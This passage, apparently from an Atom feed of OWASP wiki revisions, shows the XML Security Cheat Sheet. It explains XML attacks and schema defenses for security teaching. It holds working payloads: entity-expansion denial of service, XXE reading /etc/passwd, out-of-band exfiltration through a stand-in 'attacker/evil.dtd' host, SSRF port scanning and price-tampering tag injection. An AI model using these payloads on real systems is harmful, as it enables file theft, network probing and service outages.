  &amp;lt;!ENTITY LOL6 &amp;quot;&amp;amp;LOL5;&amp;amp;LOL5;&amp;amp;LOL5;&amp;amp;LOL5;&amp;amp;LOL5;&amp;amp;LOL5;&amp;amp;LOL5;&amp;amp;LOL5;&amp;amp;LOL5;&amp;amp;LOL5;&amp;quot;&amp;gt;&lt;br /&gt;
  &amp;lt;!ENTITY LOL7 &amp;quot;&amp;amp;LOL6;&amp;amp;LOL6;&amp;amp;LOL6;&amp;amp;LOL6;&amp;amp;LOL6;&amp;amp;LOL6;&amp;amp;LOL6;&amp;amp;LOL6;&amp;amp;LOL6;&amp;amp;LOL6;&amp;quot;&amp;gt;&lt;br /&gt;
  &amp;lt;!ENTITY LOL8 &amp;quot;&amp;amp;LOL7;&amp;amp;LOL7;&amp;amp;LOL7;&amp;amp;LOL7;&amp;amp;LOL7;&amp;amp;LOL7;&amp;amp;LOL7;&amp;amp;LOL7;&amp;amp;LOL7;&amp;amp;LOL7;&amp;quot;&amp;gt;&lt;br /&gt;
  &amp;lt;!ENTITY LOL9 &amp;quot;&amp;amp;LOL8;&amp;amp;LOL8;&amp;amp;LOL8;&amp;amp;LOL8;&amp;amp;LOL8;&amp;amp;LOL8;&amp;amp;LOL8;&amp;amp;LOL8;&amp;amp;LOL8;&amp;amp;LOL8;&amp;quot;&amp;gt;&lt;br /&gt;
 ]&amp;gt; &lt;br /&gt;
 &amp;lt;SOAP:ENVELOPE ENTITYREFERENCE=&amp;quot;'''&amp;amp;LOL9;'''&amp;quot; XMLNS:SOAP=&amp;quot;HTTP://SCHEMAS.XMLSOAP.ORG/SOAP/ENVELOPE/&amp;quot;&amp;gt; &lt;br /&gt;
  &amp;lt;SOAP:BODY&amp;gt; &lt;br /&gt;
   &amp;lt;KEYWORD XMLNS=&amp;quot;URN:PARASOFT:WS:STORE&amp;quot;&amp;gt;FOO&amp;lt;/KEYWORD&amp;gt;&lt;br /&gt;
  &amp;lt;/SOAP:BODY&amp;gt;&lt;br /&gt;
 &amp;lt;/SOAP:ENVELOPE&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== Reflected File Retrieval ===&lt;br /&gt;
Consider the following example code of an XXE:&lt;br /&gt;
 &amp;lt;?xml version=&amp;quot;1.0&amp;quot; encoding=&amp;quot;ISO-8859-1&amp;quot;?&amp;gt;&lt;br /&gt;
 &amp;lt;!DOCTYPE root [&lt;br /&gt;
  &amp;lt;!ELEMENT includeme ANY&amp;gt;&lt;br /&gt;
  &amp;lt;!ENTITY '''xxe''' SYSTEM &amp;quot;'''/etc/passwd'''&amp;quot;&amp;gt;&lt;br /&gt;
 ]&amp;gt;&lt;br /&gt;
 &amp;lt;root&amp;gt;'''&amp;amp;xxe;'''&amp;lt;/root&amp;gt;&lt;br /&gt;
&lt;br /&gt;
The previous XML defines an entity named &amp;lt;tt&amp;gt;xxe&amp;lt;/tt&amp;gt;, which is in fact the contents of &amp;lt;tt&amp;gt;/etc/passwd&amp;lt;/tt&amp;gt;, which will be expanded within the &amp;lt;tt&amp;gt;includeme&amp;lt;/tt&amp;gt; tag. If the parser allows references to external entities, it might include the contents of that file in the XML response or in the error output.&lt;br /&gt;
&lt;br /&gt;
=== Server Side Request Forgery ===&lt;br /&gt;
Server Side Request Forgery (SSRF ) happens when the server receives a malicious XML schema, which makes the server retrieve remote resources such as a file, a file via HTTP/HTTPS/FTP, etc. SSRF has been used to retrieve remote files, to prove a XXE when you cannot reflect back the file or perform port scanning, or perform brute force attacks on internal networks.&lt;br /&gt;
&lt;br /&gt;
==== External Connection ====&lt;br /&gt;
Whenever there is an XXE and you cannot retrieve a file, you can test if you would be able to establish remote connections:&lt;br /&gt;
 &amp;lt;?xml version=&amp;quot;1.0&amp;quot; encoding=&amp;quot;UTF-8&amp;quot;?&amp;gt;&lt;br /&gt;
 &amp;lt;!DOCTYPE root [ &lt;br /&gt;
  &amp;lt;!ENTITY '''%xxe''' SYSTEM &amp;quot;'''http://attacker/evil.dtd'''&amp;quot;&amp;gt; &lt;br /&gt;
  '''%xxe;'''&lt;br /&gt;
 ]&amp;gt;&lt;br /&gt;
&lt;br /&gt;
==== File Retrieval with Parameter Entities ====&lt;br /&gt;
Parameter entities allows for the retrieval of content using URL references. Consider the following malicious XML document:&lt;br /&gt;
 &amp;lt;?xml version=&amp;quot;1.0&amp;quot; encoding=&amp;quot;utf-8&amp;quot;?&amp;gt;&lt;br /&gt;
 &amp;lt;!DOCTYPE root [&lt;br /&gt;
  &amp;lt;!ENTITY % '''file''' SYSTEM &amp;quot;'''file:///etc/passwd'''&amp;quot;&amp;gt;&lt;br /&gt;
  &amp;lt;!ENTITY % '''dtd''' SYSTEM &amp;quot;'''http://attacker/evil.dtd'''&amp;quot;&amp;gt;&lt;br /&gt;
  '''%dtd;'''&lt;br /&gt;
 ]&amp;gt;&lt;br /&gt;
 &amp;lt;root&amp;gt;'''&amp;amp;send;'''&amp;lt;/root&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Here the DTD defines two external parameter entities: &amp;lt;tt&amp;gt;file&amp;lt;/tt&amp;gt; loads a local file, and &amp;lt;tt&amp;gt;dtd&amp;lt;/tt&amp;gt; which loads a remote DTD. The remote DTD should contain something like this::&lt;br /&gt;
 &amp;lt;?xml version=&amp;quot;1.0&amp;quot; encoding=&amp;quot;UTF-8&amp;quot;?&amp;gt;&lt;br /&gt;
 &amp;lt;!ENTITY % '''all''' &amp;quot;&amp;lt;!ENTITY '''send''' SYSTEM ''''http://example.com/?%file;''''''&amp;gt;&amp;quot;&amp;gt;&lt;br /&gt;
 '''%all;'''&lt;br /&gt;
&lt;br /&gt;
The second DTD causes the system to send the contents of the &amp;lt;tt&amp;gt;file&amp;lt;/tt&amp;gt; back to the attacker's server as a parameter of the URL.&lt;br /&gt;
&lt;br /&gt;
==== Port Scanning ====&lt;br /&gt;
The amount and type of information will depend on the type of implementation. Responses can be classified as follows, ranking from easy to complex:&lt;br /&gt;
&lt;br /&gt;
''' 1) Complete Disclosure '''&lt;br /&gt;
The simplest and most unusual scenario, with complete disclosure you can clearly see what’s going on by receiving the complete responses from the server being queried. You have an exact representation of what happened when connecting to the remote host.&lt;br /&gt;
&lt;br /&gt;
''' 2) Error-based '''&lt;br /&gt;
If you are unable to see the response from the remote server, you may be able to use the error response. Consider a web service leaking details on what went wrong in the SOAP Fault element when trying to establish a connection: &lt;br /&gt;
 java.io.IOException: Server returned HTTP response code: 401 for URL: http://192.168.1.1:80&lt;br /&gt;
  at sun.net.www.protocol.http.HttpURLConnection.getInputStream(HttpURLConnection.java:1459)&lt;br /&gt;
  at com.sun.org.apache.xerces.internal.impl.XMLEntityManager.setupCurrentEntity(XMLEntityManager.java:674)&lt;br /&gt;
&lt;br /&gt;
''' 3) Timeout-based '''&lt;br /&gt;
Timeouts could occur when connecting to open or closed ports depending on the schema and the underlying implementation. If the timeouts occur while you are trying to connect to a closed port (which may take one minute), the time of response when connected to a valid port will be very quick (one second, for example). The differences between open and closed ports becomes quite clear.   &lt;br /&gt;
&lt;br /&gt;
''' 4) Time-based '''&lt;br /&gt;
Sometimes differences between closed and open ports are very subtle. The only way to know the status of a port with certainty would be to take multiple measurements of the time required to reach each host; then analyze the average time for each port to determinate the status of each port. This type of attack will be difficult to accomplish when performed in higher latency networks.&lt;br /&gt;
&lt;br /&gt;
==== Brute Forcing ====&lt;br /&gt;
Once an attacker confirms that it is possible to perform a port scan, performing a brute force attack is a matter of embedding the &amp;lt;tt&amp;gt;username&amp;lt;/tt&amp;gt; and &amp;lt;tt&amp;gt;password&amp;lt;/tt&amp;gt; as part of the URI scheme (http, ftp, etc). For example the following :&lt;br /&gt;
 &amp;lt;!DOCTYPE root [&lt;br /&gt;
  &amp;lt;!ENTITY '''user''' SYSTEM &amp;quot;http://'''username:password'''@example.com:8080&amp;quot;&amp;gt;&lt;br /&gt;
 ]&amp;gt;&lt;br /&gt;
 &amp;lt;root&amp;gt;'''&amp;amp;user;'''&amp;lt;/root&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=Authors and Primary Editors=&lt;br /&gt;
&lt;br /&gt;
[mailto:fernando.arnaboldi@ioactive.com Fernando Arnaboldi]&lt;br /&gt;
&lt;br /&gt;
= Other Cheatsheets =&lt;br /&gt;
&lt;br /&gt;
{{Cheatsheet_Navigation_Body}}&lt;br /&gt;
[[Category:Cheatsheets]]&lt;br /&gt;
[[Category:Popular]]&lt;br /&gt;
[[Category:OWASP_Breakers]]&lt;br /&gt;
{{TOC hidden}}&lt;/div&gt;</summary>
		<author><name>Fernando.arnaboldi</name></author>	</entry>

	<entry>
		<id>https://wiki.owasp.org/index.php?title=XML_Security_Cheat_Sheet&amp;diff=224445</id>
		<title>XML Security Cheat Sheet</title>
		<link rel="alternate" type="text/html" href="https://wiki.owasp.org/index.php?title=XML_Security_Cheat_Sheet&amp;diff=224445"/>
				<updated>2016-12-21T21:01:00Z</updated>
		
		<summary type="html">&lt;p&gt;Fernando.arnaboldi: &lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;== Introduction ==&lt;br /&gt;
&lt;br /&gt;
Specifications for XML and XML schemas include multiple security flaws. At the same time, these specifications provide the tools required to protect XML applications. Even though we use XML schemas to define the security of XML documents, they can be used to perform a variety of attacks: file retrieval, server side request forgery, port scanning, or brute forcing. This cheat sheet exposes how to exploit the different possibilities in libraries and software divided in two sections:&lt;br /&gt;
* '''Malformed XML Documents''': vulnerabilities using not well formed documents.&lt;br /&gt;
* '''Invalid XML Documents''': vulnerabilities using documents that do not have the expected structure.&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
=  Malformed XML Documents =&lt;br /&gt;
The W3C XML specification defines a set of principles that XML documents must follow to be considered well formed. When a document violates any of these principles, it must be considered a fatal error and the data it contains is considered malformed. Multiple tactics will cause a malformed document: removing an ending tag, rearranging the order of elements into a nonsensical structure, introducing forbidden characters, and so on. The XML parser should stop execution once detecting a fatal error. The document should not undergo any additional processing, and the application should display an error message.&lt;br /&gt;
&lt;br /&gt;
The recommendation to avoid these vulnerabilities are to use an XML processor that follows W3C specifications and does not take significant additional time to process malformed documents. In addition, use only well-formed documents and validate the contents of each element and attribute to process only valid values within predefined boundaries.&lt;br /&gt;
&lt;br /&gt;
== More Time Required ==&lt;br /&gt;
A malformed document may affect the consumption of Central Processing Unit (CPU) resources. In certain scenarios, the amount of time required to process malformed documents may be greater than that required for well-formed documents. When this happens, an attacker may exploit an asymmetric resource consumption attack to take advantage of the greater processing time to cause a Denial of Service (DoS). &lt;br /&gt;
&lt;br /&gt;
To analyze the likelihood of this attack, analyze the time taken by a regular XML document vs the time taken by a malformed version of that same document. Then, consider how an attacker could use this vulnerability in conjunction with an XML flood attack using multiple documents to amplify the effect.&lt;br /&gt;
&lt;br /&gt;
== Applications Processing Malformed Data ==&lt;br /&gt;
Certain XML parsers have the ability to recover malformed documents. They can be instructed to try their best to return a valid tree with all the content that they can manage to parse, regardless of the document’s noncompliance with the specifications. Since there are no predefined rules for the recovery process, the approach and results may not always be the same. Using malformed documents might lead to unexpected issues related to data integrity.&lt;br /&gt;
&lt;br /&gt;
The following two scenarios illustrate attack vectors a parser will analyze in recovery mode:&lt;br /&gt;
&lt;br /&gt;
=== Malformed Document to Malformed Document ===&lt;br /&gt;
According to the XML specification, the string &amp;lt;tt&amp;gt;--&amp;lt;/tt&amp;gt; (double-hyphen) must not occur within comments. Using the recovery mode of lxml and PHP, the following document will remain the same after being recovered:&lt;br /&gt;
 &amp;lt;pre&amp;gt;&amp;lt;element&amp;gt;&lt;br /&gt;
 &amp;lt;!-- one&lt;br /&gt;
  &amp;lt;!-- another comment&lt;br /&gt;
 comment --&amp;gt;&lt;br /&gt;
&amp;lt;/element&amp;gt;&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== Well-Formed Document to Well-Formed Document Normalized ===&lt;br /&gt;
Certain parsers may consider normalizing the contents of your &amp;lt;tt&amp;gt;CDATA&amp;lt;/tt&amp;gt; sections. This means that they will update the special characters contained in the &amp;lt;tt&amp;gt;CDATA&amp;lt;/tt&amp;gt; section to contain the safe versions of these characters even though is not required: &lt;br /&gt;
 &amp;lt;element&amp;gt;&lt;br /&gt;
  &amp;lt;![CDATA[&amp;lt;script&amp;gt;a=1;&amp;lt;/script&amp;gt;]]&amp;gt;&lt;br /&gt;
 &amp;lt;/element&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Normalization of a &amp;lt;tt&amp;gt;CDATA&amp;lt;/tt&amp;gt; section is not a common rule among parsers. Libxml could transform this document to its canonical version, but although well formed, its contents may be considered malformed depending on the situation:&lt;br /&gt;
 &amp;lt;element&amp;gt;&lt;br /&gt;
  '''&amp;amp;amp;lt;script&amp;amp;amp;gt;a=1;&amp;amp;amp;lt;/script&amp;amp;amp;gt;'''&lt;br /&gt;
 &amp;lt;/element&amp;gt;&lt;br /&gt;
&lt;br /&gt;
== Coersive Parsing ==&lt;br /&gt;
A coercive attack in XML involves parsing deeply nested XML documents without their corresponding ending tags. The idea is to make the victim use up —and eventually deplete— the machine’s resources and cause a denial of service on the target.&lt;br /&gt;
Reports of a DoS attack in Firefox 3.67 included the use of 30,000 open XML elements without their corresponding ending tags. Removing the closing tags simplified the attack since it requires only half of the size of a well-formed document to accomplish the same results. The number of tags being processed eventually caused a stack overflow. A simplified version of such a document would look like this: &lt;br /&gt;
 &amp;lt;A1&amp;gt;&lt;br /&gt;
  &amp;lt;A2&amp;gt; &lt;br /&gt;
   &amp;lt;A3&amp;gt;&lt;br /&gt;
    ...&lt;br /&gt;
     &amp;lt;A30000&amp;gt;&lt;br /&gt;
&lt;br /&gt;
== Violation of XML Specification Rules ==&lt;br /&gt;
Unexpected consequences may result from manipulating documents using parsers that do not follow W3C specifications. It may be possible to achieve crashes and/or code execution when the software does not properly verify how to handle incorrect XML structures. Feeding the software with fuzzed XML documents may expose this behavior. &lt;br /&gt;
&lt;br /&gt;
= Invalid XML Documents =&lt;br /&gt;
Attackers may introduce unexpected values in documents to take advantage of an application that does not verify whether the document contains a valid set of values. Schemas specify restrictions that help identify whether documents are valid. A valid document is well formed and complies with the restrictions of a schema, and more than one schema can be used to validate a document. These restrictions may appear in multiple files, either using a single schema language or relying on the strengths of the different schema languages.&lt;br /&gt;
&lt;br /&gt;
The recommendation to avoid these vulnerabilities is that each XML document must have a precisely defined XML Schema (not DTD) with every piece of information properly restricted to avoid problems of improper data validation. Use a local copy or a known good repository instead of the schema reference supplied in the XML document. Also, perform an integrity check of the XML schema file being referenced, bearing in mind the possibility that the repository could be compromised. In cases where the XML documents are using remote schemas, configure servers to use only secure, encrypted communications to prevent attackers from eavesdropping on network traffic.&lt;br /&gt;
&lt;br /&gt;
== Document without Schema ==&lt;br /&gt;
Consider a bookseller that uses a web service through a web interface to make transactions. The XML document for transactions is composed of two elements: an &amp;lt;tt&amp;gt;id&amp;lt;/tt&amp;gt; value related to an item and a certain &amp;lt;tt&amp;gt;price&amp;lt;/tt&amp;gt;. The user may only introduce a certain &amp;lt;tt&amp;gt;id&amp;lt;/tt&amp;gt; value using the web interface:&lt;br /&gt;
 &amp;lt;buy&amp;gt;&lt;br /&gt;
  &amp;lt;id&amp;gt;'''123'''&amp;lt;/id&amp;gt;&lt;br /&gt;
  &amp;lt;price&amp;gt;10&amp;lt;/price&amp;gt;&lt;br /&gt;
 &amp;lt;/buy&amp;gt;&lt;br /&gt;
&lt;br /&gt;
If there is no control on the document’s structure, the application could also process different well-formed messages with unintended consequences. The previous document could have contained additional tags to affect the behavior of the underlying application processing its contents:&lt;br /&gt;
 &amp;lt;buy&amp;gt;&lt;br /&gt;
  &amp;lt;id&amp;gt;'''123&amp;lt;/id&amp;gt;&amp;lt;price&amp;gt;0&amp;lt;/price&amp;gt;&amp;lt;id&amp;gt;'''&amp;lt;/id&amp;gt;&lt;br /&gt;
  &amp;lt;price&amp;gt;10&amp;lt;/price&amp;gt;&lt;br /&gt;
 &amp;lt;/buy&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Notice again how the value 123 is supplied as an &amp;lt;tt&amp;gt;id&amp;lt;/tt&amp;gt;, but now the document includes additional opening and closing tags. The attacker closed the &amp;lt;tt&amp;gt;id&amp;lt;/tt&amp;gt; element and sets a bogus &amp;lt;tt&amp;gt;price&amp;lt;/tt&amp;gt; element to the value 0. The final step to keep the structure well-formed is to add one empty &amp;lt;tt&amp;gt;id&amp;lt;/tt&amp;gt; element. After this, the application adds the closing tag for &amp;lt;tt&amp;gt;id&amp;lt;/tt&amp;gt; and set the &amp;lt;tt&amp;gt;price&amp;lt;/tt&amp;gt; to 10.  If the application processes only the first values provided for the id and the value without performing any type of control on the structure, it could benefit the attacker by providing the ability to buy a book without actually paying for it.&lt;br /&gt;
&lt;br /&gt;
== Unrestrictive Schema ==&lt;br /&gt;
Certain schemas do not offer enough restrictions for the type of data that each element can receive. This is what normally happens when using DTD; it has a very limited set of possibilities compared to the type of restrictions that can be applied in XML documents. This could expose the application to undesired values within elements or attributes that would be easy to constrain when using other schema languages. In the following example, a person’s &amp;lt;tt&amp;gt;age&amp;lt;/tt&amp;gt; is validated against an inline DTD schema:&lt;br /&gt;
 &amp;lt;!DOCTYPE person [&lt;br /&gt;
  &amp;lt;!ELEMENT person (name, age)&amp;gt;&lt;br /&gt;
  &amp;lt;!ELEMENT name (#PCDATA)&amp;gt;&lt;br /&gt;
  &amp;lt;!ELEMENT age (#PCDATA)&amp;gt;&lt;br /&gt;
 ]&amp;gt;&lt;br /&gt;
 &amp;lt;person&amp;gt;&lt;br /&gt;
  &amp;lt;name&amp;gt;John Doe&amp;lt;/name&amp;gt;&lt;br /&gt;
  &amp;lt;age&amp;gt;'''11111..(1.000.000digits)..11111'''&amp;lt;/age&amp;gt;&lt;br /&gt;
 &amp;lt;/person&amp;gt;&lt;br /&gt;
&lt;br /&gt;
The previous document contains an inline DTD with a root element named &amp;lt;tt&amp;gt;person&amp;lt;/tt&amp;gt;. This element contains two elements in a specific order: &amp;lt;tt&amp;gt;name&amp;lt;/tt&amp;gt; and then &amp;lt;tt&amp;gt;age&amp;lt;/tt&amp;gt;. The element &amp;lt;tt&amp;gt;name&amp;lt;/tt&amp;gt; is then defined to contain &amp;lt;tt&amp;gt;PCDATA&amp;lt;/tt&amp;gt; as well as the element &amp;lt;tt&amp;gt;age&amp;lt;/tt&amp;gt;. After this definition begins the well-formed and valid XML document. The element name contains an irrelevant value but the &amp;lt;tt&amp;gt;age&amp;lt;/tt&amp;gt; element contains one million digits. Since there are no restrictions on the maximum size for the &amp;lt;tt&amp;gt;age&amp;lt;/tt&amp;gt; element, this one-million-digit string could be sent to the server for this element. Typically this type of element should be restricted to contain no more than a certain amount of characters and constrained to a certain set of characters (for example, digits from 0 to 9, the + sign and the - sign).&lt;br /&gt;
If not properly restricted, applications may handle potentially invalid values contained in documents. Since it is not possible to indicate specific restrictions (a maximum length for the element &amp;lt;tt&amp;gt;name&amp;lt;/tt&amp;gt; or a valid range for the element &amp;lt;tt&amp;gt;age&amp;lt;/tt&amp;gt;), this type of schema increases the risk of affecting the integrity and availability of resources.&lt;br /&gt;
&lt;br /&gt;
== Improper Data Validation == &lt;br /&gt;
When schemas are insecurely defined and do not provide strict rules, they may expose the application to diverse situations. The result of this could be the disclosure of internal errors or documents that hit the application’s functionality with unexpected values.&lt;br /&gt;
&lt;br /&gt;
=== String Data Types ===&lt;br /&gt;
Provided you need to use a hexadecimal value, there is no point in defining this value as a string that will later be restricted to the specific 16 hexadecimal characters. To exemplify this scenario, when using XML encryption  some values must be encoded using base64 . This is the schema definition of how these values should look:&lt;br /&gt;
 &amp;lt;element name=&amp;quot;CipherData&amp;quot; type=&amp;quot;xenc:CipherDataType&amp;quot;/&amp;gt;&lt;br /&gt;
  &amp;lt;complexType name=&amp;quot;CipherDataType&amp;quot;&amp;gt;&lt;br /&gt;
   &amp;lt;choice&amp;gt;&lt;br /&gt;
    &amp;lt;element name=&amp;quot;CipherValue&amp;quot; type=&amp;quot;'''base64Binary'''&amp;quot;/&amp;gt;&lt;br /&gt;
    &amp;lt;element ref=&amp;quot;xenc:CipherReference&amp;quot;/&amp;gt;&lt;br /&gt;
   &amp;lt;/choice&amp;gt;&lt;br /&gt;
  &amp;lt;/complexType&amp;gt;&lt;br /&gt;
&lt;br /&gt;
The previous schema defines the element &amp;lt;tt&amp;gt;CipherValue&amp;lt;/tt&amp;gt; as a base64 data type. As an example, the IBM WebSphere DataPower SOA Appliance allowed any type of characters within this element after a valid base64 value, and will consider it valid. The first portion of this data is properly checked as a base64 value, but the remaining characters could be anything else (including other sub-elements of the &amp;lt;tt&amp;gt;CipherData&amp;lt;/tt&amp;gt; element). Restrictions are partially set for the element, which means that the information is probably tested using an application instead of the proposed sample schema. &lt;br /&gt;
&lt;br /&gt;
=== Numeric Data Types ===&lt;br /&gt;
Defining the correct data type for numbers can be more complex since there are more options than there are for strings. &lt;br /&gt;
&lt;br /&gt;
==== Negative and Positive Restrictions ====&lt;br /&gt;
XML Schema numeric data types can include different ranges of numbers. They could include:&lt;br /&gt;
* '''negativeInteger''': Only negative numbers&lt;br /&gt;
* '''nonNegativeInteger''': Negative numbers and the zero value&lt;br /&gt;
* '''positiveInteger''': Only positive numbers&lt;br /&gt;
* '''nonPositiveInteger''': Positive numbers and the zero value&lt;br /&gt;
The following sample document defines an &amp;lt;tt&amp;gt;id&amp;lt;/tt&amp;gt; for a product, a &amp;lt;tt&amp;gt;price&amp;lt;/tt&amp;gt;, and a &amp;lt;tt&amp;gt;quantity&amp;lt;/tt&amp;gt; value that is under the control of an attacker:&lt;br /&gt;
 &amp;lt;buy&amp;gt;&lt;br /&gt;
  &amp;lt;id&amp;gt;1&amp;lt;/id&amp;gt;&lt;br /&gt;
  &amp;lt;price&amp;gt;10&amp;lt;/price&amp;gt;&lt;br /&gt;
  &amp;lt;quantity&amp;gt;'''1'''&amp;lt;/quantity&amp;gt;&lt;br /&gt;
 &amp;lt;/buy&amp;gt;&lt;br /&gt;
&lt;br /&gt;
To avoid repeating old errors, an XML schema may be defined to prevent processing the incorrect structure in cases where an attacker wants to introduce additional elements:&lt;br /&gt;
 &amp;lt;xs:schema xmlns:xs=&amp;quot;http://www.w3.org/2001/XMLSchema&amp;quot;&amp;gt;&lt;br /&gt;
  &amp;lt;xs:element name=&amp;quot;buy&amp;quot;&amp;gt;&lt;br /&gt;
   &amp;lt;xs:complexType&amp;gt;&lt;br /&gt;
    &amp;lt;xs:sequence&amp;gt;&lt;br /&gt;
     &amp;lt;xs:element name=&amp;quot;id&amp;quot; type=&amp;quot;xs:integer&amp;quot;/&amp;gt;&lt;br /&gt;
     &amp;lt;xs:element name=&amp;quot;price&amp;quot; type=&amp;quot;xs:decimal&amp;quot;/&amp;gt;&lt;br /&gt;
     &amp;lt;xs:element name=&amp;quot;quantity&amp;quot; type=&amp;quot;'''xs:integer'''&amp;quot;/&amp;gt;&lt;br /&gt;
    &amp;lt;/xs:sequence&amp;gt;&lt;br /&gt;
   &amp;lt;/xs:complexType&amp;gt;&lt;br /&gt;
  &amp;lt;/xs:element&amp;gt;&lt;br /&gt;
 &amp;lt;/xs:schema&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Limiting that &amp;lt;tt&amp;gt;quantity&amp;lt;/tt&amp;gt; to an integer data type will avoid any unexpected characters. Once the application receives the previous message, it may calculate the final price by doing &amp;lt;tt&amp;gt;price*quantity&amp;lt;/tt&amp;gt;. However, since this data type may allow negative values, it might allow a negative result on the user’s account if an attacker provides a negative number. What you probably want to see in here to avoid that logical vulnerability is positiveInteger instead of integer. &lt;br /&gt;
&lt;br /&gt;
==== Divide by Zero ====&lt;br /&gt;
Whenever using user controlled values as denominators in a division, developers should avoid allowing the number zero.  In cases where the value zero is used for division in XSLT, the error &amp;lt;tt&amp;gt;FOAR0001&amp;lt;/tt&amp;gt; will occur. Other applications may throw other exceptions and the program may crash. There are specific data types for XML schemas that specifically avoid using the zero value. For example, in cases where negative values and zero are not considered valid, the schema could specify the data type &amp;lt;tt&amp;gt;positiveInteger&amp;lt;/tt&amp;gt; for the element. &lt;br /&gt;
 &amp;lt;xs:element name=&amp;quot;denominator&amp;quot;&amp;gt;&lt;br /&gt;
  &amp;lt;xs:simpleType&amp;gt;&lt;br /&gt;
   &amp;lt;xs:restriction base=&amp;quot;'''xs:positiveInteger'''&amp;quot;/&amp;gt;&lt;br /&gt;
  &amp;lt;/xs:simpleType&amp;gt;&lt;br /&gt;
 &amp;lt;/xs:element&amp;gt;&lt;br /&gt;
&lt;br /&gt;
The element &amp;lt;tt&amp;gt;denominator&amp;lt;/tt&amp;gt; is now restricted to positive integers. This means that only values greater than zero will be considered valid. If you see any other type of restriction being used, you may trigger an error if the denominator is zero.&lt;br /&gt;
&lt;br /&gt;
==== Special Values: Infinity and Not a Number (NaN) ====&lt;br /&gt;
The data types &amp;lt;tt&amp;gt;float&amp;lt;/tt&amp;gt; and &amp;lt;tt&amp;gt;double&amp;lt;/tt&amp;gt; contain real numbers and some special values: &amp;lt;tt&amp;gt;-Infinity&amp;lt;/tt&amp;gt; or &amp;lt;tt&amp;gt;-INF&amp;lt;/tt&amp;gt;, &amp;lt;tt&amp;gt;NaN&amp;lt;/tt&amp;gt;, and &amp;lt;tt&amp;gt;+Infinity&amp;lt;/tt&amp;gt; or &amp;lt;tt&amp;gt;INF&amp;lt;/tt&amp;gt;. These possibilities may be useful to express certain values, but they are sometimes misused. The problem is that they are commonly used to express only real numbers such as prices. This is a common error seen in other programming languages, not solely restricted to these technologies.&lt;br /&gt;
Not considering the whole spectrum of possible values for a data type could make underlying applications fail. If the special values &amp;lt;tt&amp;gt;Infinity&amp;lt;/tt&amp;gt; and &amp;lt;tt&amp;gt;NaN&amp;lt;/tt&amp;gt; are not required and only real numbers are expected, the data type &amp;lt;tt&amp;gt;decimal&amp;lt;/tt&amp;gt; is recommended:&lt;br /&gt;
 &amp;lt;xs:schema xmlns:xs=&amp;quot;http://www.w3.org/2001/XMLSchema&amp;quot;&amp;gt;&lt;br /&gt;
  &amp;lt;xs:element name=&amp;quot;buy&amp;quot;&amp;gt;&lt;br /&gt;
   &amp;lt;xs:complexType&amp;gt;&lt;br /&gt;
    &amp;lt;xs:sequence&amp;gt;&lt;br /&gt;
     &amp;lt;xs:element name=&amp;quot;id&amp;quot; type=&amp;quot;xs:integer&amp;quot;/&amp;gt;&lt;br /&gt;
     &amp;lt;xs:element name=&amp;quot;price&amp;quot; type=&amp;quot;'''xs:decimal'''&amp;quot;/&amp;gt;&lt;br /&gt;
     &amp;lt;xs:element name=&amp;quot;quantity&amp;quot; type=&amp;quot;xs:positiveInteger&amp;quot;/&amp;gt;&lt;br /&gt;
    &amp;lt;/xs:sequence&amp;gt;&lt;br /&gt;
   &amp;lt;/xs:complexType&amp;gt;&lt;br /&gt;
  &amp;lt;/xs:element&amp;gt;&lt;br /&gt;
 &amp;lt;/xs:schema&amp;gt;&lt;br /&gt;
&lt;br /&gt;
The price value will not trigger any errors when set at Infinity or NaN, because these values will not be valid. An attacker can exploit this issue if those values are allowed.&lt;br /&gt;
&lt;br /&gt;
=== General Data Restrictions ===&lt;br /&gt;
After selecting the appropriate data type, developers may apply additional restrictions. Sometimes only a certain subset of values within a data type will be considered valid:&lt;br /&gt;
&lt;br /&gt;
==== Prefixed Values ====&lt;br /&gt;
Certain types of values should only be restricted to specific sets: traffic lights will have only three types of colors, only 12 months are available, and so on. It is possible that the schema has these restrictions in place for each element or attribute. This is the most perfect whitelist scenario for an application: only specific values will be accepted. Such a constraint is called &amp;lt;tt&amp;gt;enumeration&amp;lt;/tt&amp;gt; in XML schema. The following example restricts the contents of the element month to 12 possible values:&lt;br /&gt;
 &amp;lt;xs:element name=&amp;quot;month&amp;quot;&amp;gt;&lt;br /&gt;
  &amp;lt;xs:simpleType&amp;gt;&lt;br /&gt;
   &amp;lt;xs:restriction base=&amp;quot;xs:string&amp;quot;&amp;gt;&lt;br /&gt;
    &amp;lt;xs:'''enumeration''' value=&amp;quot;January&amp;quot;/&amp;gt;&lt;br /&gt;
    &amp;lt;xs:'''enumeration''' value=&amp;quot;February&amp;quot;/&amp;gt;&lt;br /&gt;
    &amp;lt;xs:'''enumeration''' value=&amp;quot;March&amp;quot;/&amp;gt;&lt;br /&gt;
    &amp;lt;xs:'''enumeration''' value=&amp;quot;April&amp;quot;/&amp;gt;&lt;br /&gt;
    &amp;lt;xs:'''enumeration''' value=&amp;quot;May&amp;quot;/&amp;gt;&lt;br /&gt;
    &amp;lt;xs:'''enumeration''' value=&amp;quot;June&amp;quot;/&amp;gt;&lt;br /&gt;
    &amp;lt;xs:'''enumeration''' value=&amp;quot;July&amp;quot;/&amp;gt;&lt;br /&gt;
    &amp;lt;xs:'''enumeration''' value=&amp;quot;August&amp;quot;/&amp;gt;&lt;br /&gt;
    &amp;lt;xs:'''enumeration''' value=&amp;quot;September&amp;quot;/&amp;gt;&lt;br /&gt;
    &amp;lt;xs:'''enumeration''' value=&amp;quot;October&amp;quot;/&amp;gt;&lt;br /&gt;
    &amp;lt;xs:'''enumeration''' value=&amp;quot;November&amp;quot;/&amp;gt;&lt;br /&gt;
    &amp;lt;xs:'''enumeration''' value=&amp;quot;December&amp;quot;/&amp;gt;&lt;br /&gt;
   &amp;lt;/xs:restriction&amp;gt;&lt;br /&gt;
  &amp;lt;/xs:simpleType&amp;gt;&lt;br /&gt;
 &amp;lt;/xs:element&amp;gt;&lt;br /&gt;
&lt;br /&gt;
By limiting the month element’s value to any of the previous values, the application will not be manipulating random strings.&lt;br /&gt;
&lt;br /&gt;
==== Ranges ====&lt;br /&gt;
